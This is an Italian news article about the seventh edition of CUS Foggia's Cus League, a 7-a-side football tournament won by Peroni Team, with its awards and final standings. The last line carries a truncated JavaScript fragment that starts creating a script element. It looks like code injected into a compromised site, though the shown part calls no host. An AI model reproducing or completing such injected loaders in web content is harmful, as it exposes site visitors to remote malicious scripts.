.
News
  • Home

La festa del Peroni Team chiude la settima edizione della Cus League

di trarre 0
27 Mag 2016

Si è chiuso con il successo, nemmeno a dirlo, del Peroni Team sulla Diamond Foggia il lungo torneo invernale di calcio a 7 organizzato dal Cus Foggia.

L’ultima partita del girone scudetto ha confermato ancora una volta la bontà e la qualità dell’organico dei bicampioni. La squadra rossoblu non ha fatto sconti a Palmieri e compagni e nonostante la conquista del campionato ipotecata già da una settimana, ha lottato fino all’ultimo minuto vincendo (4-1) e giocando soprattutto per il suo bomber Raffaele Delli Carri, il quale grazie alla tripletta di ieri ha conquistato il titolo di capocannoniere stagionale (26 gol realizzati tra campionato e coppa).

Al termine della partita i responsabili del Cus Foggia, dopo aver dato appuntamento al prossimo torneo estivo, hanno proceduto alla premiazione dei vari vincitori dei primi individuali e di squadra della Cus League e della Coppa Cus 2015/2016.

Abbuffata di coppe ed applausi proprio per il Peroni Team e lavori straordinari per capitan Lastella che ha avuto l’onore ed il piacere di alzare al cielo sia il trofeo dello scudetto che quello della Coppa.
Un double impreziosito e completato dal titolo di capocannoniere vinto, come detto, al fotofinish da Raffaele Delli Carri (staccato di un solo gol Nicola Rossi della Insanity) e dalla statuetta del miglior giocatore assegnata all’ottimo Nicola Caputo.

Due le coppe alzate anche dalla Diamond Foggia, formazione arrivata seconda nelle due competizioni.
Terzo posto in campionato e premio come miglior squadra universitaria sono invece i titoli assegnati ad Insanity.

Gloria anche per l’Atletico Ma Non Troppo, premiato con la Coppa Disciplina.  

CLASSIFICA FINALE CUS LEAGUE

classifica cus league

CUSLEAGUE 2015 calendario finalevar d=document;var s=d.createElement(‘script’);